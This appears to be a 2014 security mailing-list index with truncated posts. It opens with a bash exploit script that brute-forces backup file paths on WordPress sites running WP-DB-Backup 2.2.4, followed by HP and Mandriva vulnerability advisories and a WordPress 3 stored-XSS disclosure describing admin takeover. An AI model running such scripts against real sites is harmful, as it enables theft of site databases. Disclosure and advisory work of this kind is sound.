Larry W. Cashdollar | 22 Nov 17:55 2014

Exploit for stealing backups on WP sites with WP-DB-Backup v2.2.4 plugin

#!/bin/bash
#Larry W. Cashdollar, @_larry0
#Will brute force and search a Wordpress target site with WP-DB-Backup v2.2.4 plugin installed for any backups done on
#20141031 assumes the wordpress database is wordpress and the table prefix is wp_
#http://www.vapid.dhs.org/advisories/wordpress/plugins/wp-db-backup-v2.2.4/
#http://thehackerblog.com/auditing-wp-db-backup-wordpress-plugin-why-using-the-database-password-for-entropy-is-a-bad-idea/
#run ./exp targetsite

DATE="20141031"; #Date to search

if [ ! -e rainbow ]; then

cat << -EOF- > rbow.c
/*Create rainbow table for guessing wp-backup-db v2.2.4 backup path 
Larry W. Cashdollar*/
#include <stdio.h>
int
main (void)
{
  char string[16] = "0123456789abcdef";
  int x, y, z, a, b;
  for (x = 0; x < 16; x++)
      for (y = 0; y < 16; y++)
	  for (z = 0; z < 16; z++)
	      for (a = 0; a < 16; a++)
		  for (b = 0; b < 16; b++)
		      printf ("%c%c%c%c%c\n", string[x], string[y], string[z],
			      string[a], string[b]);
return(0);
(Continue reading)

security-alert | 21 Nov 20:14 2014

[security bulletin] HPSBUX03087 SSRT101413 rev.2 - HP-UX CIFS Server (Samba), Remote Denial of Service (DoS), Execution of Arbitrary Code, Unauthorized Access


Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04396638

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04396638
Version: 2

HPSBUX03087 SSRT101413 rev.2 - HP-UX CIFS Server (Samba), Remote Denial of
Service (DoS), Execution of Arbitrary Code, Unauthorized Access

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2014-08-07
Last Updated: 2014-11-20

Potential Security Impact: Remote Denial of Service (DoS), execution of
arbitrary code, unauthorized access.

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP-UX
CIFS-Server (Samba). The vulnerabilities could be exploited remotely to cause
a Denial of Service (DoS), execution of arbitrary code, or unauthorized
access.

(Continue reading)

security | 21 Nov 18:40 2014

[ MDVSA-2014:224 ] krb5


 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2014:224
 http://www.mandriva.com/en/support/security/
 _______________________________________________________________________

 Package : krb5
 Date    : November 21, 2014
 Affected: Business Server 1.0
 _______________________________________________________________________

 Problem Description:

 Updated krb5 packages fix security vulnerability:

 The kadm5_randkey_principal_3 function in lib/kadm5/srv/svr_principal.c
 in kadmind in MIT Kerberos 5 (aka krb5) before 1.13 sends old keys
 in a response to a -randkey -keepold request, which allows remote
 authenticated users to forge tickets by leveraging administrative
 access (CVE-2014-5351).
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5351
 http://advisories.mageia.org/MGASA-2014-0477.html
 _______________________________________________________________________

 Updated Packages:
(Continue reading)

security | 21 Nov 18:37 2014

[ MDVSA-2014:223 ] wireshark


 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2014:223
 http://www.mandriva.com/en/support/security/
 _______________________________________________________________________

 Package : wireshark
 Date    : November 21, 2014
 Affected: Business Server 1.0
 _______________________________________________________________________

 Problem Description:

 Updated wireshark packages fix security vulnerabilities:

 SigComp UDVM buffer overflow (CVE-2014-8710).

 AMQP crash (CVE-2014-8711).

 NCP crashes (CVE-2014-8712, CVE-2014-8713).

 TN5250 infinite loops (CVE-2014-8714).
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8710
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8711
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8712
(Continue reading)

security | 21 Nov 18:34 2014

[ MDVSA-2014:222 ] libvirt


 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2014:222
 http://www.mandriva.com/en/support/security/
 _______________________________________________________________________

 Package : libvirt
 Date    : November 21, 2014
 Affected: Business Server 1.0
 _______________________________________________________________________

 Problem Description:

 Updated libvirt packages fix security vulnerability:

 Eric Blake discovered that libvirt incorrectly handled permissions
 when processing the qemuDomainFormatXML command. An attacker with
 read-only privileges could possibly use this to gain access to certain
 information from the domain xml file (CVE-2014-7823).
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7823
 http://advisories.mageia.org/MGASA-2014-0470.html
 _______________________________________________________________________

 Updated Packages:

(Continue reading)

security | 21 Nov 18:32 2014

[ MDVSA-2014:221 ] php-smarty


 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2014:221
 http://www.mandriva.com/en/support/security/
 _______________________________________________________________________

 Package : php-smarty
 Date    : November 21, 2014
 Affected: Business Server 1.0
 _______________________________________________________________________

 Problem Description:

 
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4437
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8350
 http://advisories.mageia.org/MGASA-2014-0468.html
 _______________________________________________________________________

 Updated Packages:

 Mandriva Business Server 1/X86_64:
 38a8116d38c6a5e28253eb661efb95fe  mbs1/x86_64/php-smarty-3.1.21-1.mbs1.noarch.rpm
 11a6b6429cce35fe9f6b6c621eff5ef9  mbs1/x86_64/php-smarty-doc-3.1.21-1.mbs1.noarch.rpm 
 b193233fb2a189c10e77c530801e210f  mbs1/SRPMS/php-smarty-3.1.21-1.mbs1.src.rpm
(Continue reading)

security | 21 Nov 18:27 2014

[ MDVSA-2014:220 ] qemu


 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2014:220
 http://www.mandriva.com/en/support/security/
 _______________________________________________________________________

 Package : qemu
 Date    : November 21, 2014
 Affected: Business Server 1.0
 _______________________________________________________________________

 Problem Description:

 Updated qemu packages fix security vulnerabilities:

 Michael S. Tsirkin discovered that QEMU incorrectly handled vmxnet3
 devices. A local guest could possibly use this issue to cause a
 denial of service, or possibly execute arbitrary code on the host
 (CVE-2013-4544).

 Multiple integer overflow, input validation, logic error, and buffer
 overflow flaws were discovered in various QEMU block drivers. An
 attacker able to modify a disk image file loaded by a guest could
 use these flaws to crash the guest, or corrupt QEMU process memory
 on the host, potentially resulting in arbitrary code execution on
 the host with the privileges of the QEMU process (CVE-2014-0143,
 CVE-2014-0144, CVE-2014-0145, CVE-2014-0147).

 A buffer overflow flaw was found in the way the virtio_net_handle_mac()
(Continue reading)

security | 21 Nov 18:18 2014

[ MDVSA-2014:219 ] srtp


 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2014:219
 http://www.mandriva.com/en/support/security/
 _______________________________________________________________________

 Package : srtp
 Date    : November 21, 2014
 Affected: Business Server 1.0
 _______________________________________________________________________

 Problem Description:

 Updated srtp package fixes security vulnerability:

 Fernando Russ from Groundworks Technologies reported a buffer
 overflow flaw in srtp, Cisco's reference implementation
 of the Secure Real-time Transport Protocol (SRTP), in how
 the crypto_policy_set_from_profile_for_rtp() function applies
 cryptographic profiles to an srtp_policy. A remote attacker could
 exploit this vulnerability to crash an application linked against
 libsrtp, resulting in a denial of service (CVE-2013-2139).
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2139
 http://advisories.mageia.org/MGASA-2014-0465.html
 _______________________________________________________________________
(Continue reading)

security-alert | 21 Nov 16:51 2014

[security bulletin] HPSBHF03052 rev.2 - HP Network Products running OpenSSL, Multiple Remote Vulnerabilities


Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04347622

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04347622
Version: 2

HPSBHF03052 rev.2 - HP Network Products running OpenSSL, Multiple Remote
Vulnerabilities

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2014-06-20
Last Updated: 2014-11-20

Potential Security Impact: Remote Denial of Service (DoS), code execution,
unauthorized access, modification of information, disclosure of information

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP Network
Products running OpenSSL. The vulnerabilities could be exploited remotely to
create a Denial of Service (DoS), execute code, allow unauthorized access,
modify or disclose information.

(Continue reading)

security | 21 Nov 13:48 2014

[ MDVSA-2014:218 ] asterisk


 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2014:218
 http://www.mandriva.com/en/support/security/
 _______________________________________________________________________

 Package : asterisk
 Date    : November 21, 2014
 Affected: Business Server 1.0
 _______________________________________________________________________

 Problem Description:

 Multiple vulnerabilities have been discovered and corrected in asterisk:

 Remote crash when handling out of call message in certain dialplan
 configurations (CVE-2014-6610).

 Asterisk Susceptibility to POODLE Vulnerability (CVE-2014-3566).

 Mixed IP address families in access control lists may permit unwanted
 traffic.

 High call load may result in hung channels in ConfBridge.

 Permission escalation through ConfBridge actions/dialplan functions.

 The updated packages have been upgraded to the 11.14.1 version which
 is not vulnerable to these issues.
(Continue reading)

Jouko Pynnonen | 20 Nov 20:57 2014

WordPress 3 persistent script injection

OVERVIEW
========

A security flaw in WordPress 3 allows injection of JavaScript into
certain text fields. In particular, the problem affects comment boxes
on WordPress posts and pages. These don't require authentication by
default.

The JavaScript injected into a comment is executed when the target
user views it, either on a blog post, a page, or in the Comments
section of the administrative Dashboard.

In the most obvious scenario the attacker leaves a comment containing
the JavaScript and some links in order to put the comment in the
moderation queue. The exploit is not then visible to normal users,
search engines, etc.

When a blog administrator goes to the Dashboard/Comments section to
review new comments, the JavaScript gets executed. The script can then
perform operations with administrator privileges.

For instance, our PoC exploits first clean up traces of the injected
script from the database, then perform other administrative tasks such
as changing the current user's password, adding a new administrator
account, or using the plugin editor to write attacker-supplied PHP
code on the server (this impact applies to any WordPress XSS if
triggered by an administrator).

These operations happen in the background without the user seeing
anything out of the ordinary.
(Continue reading)
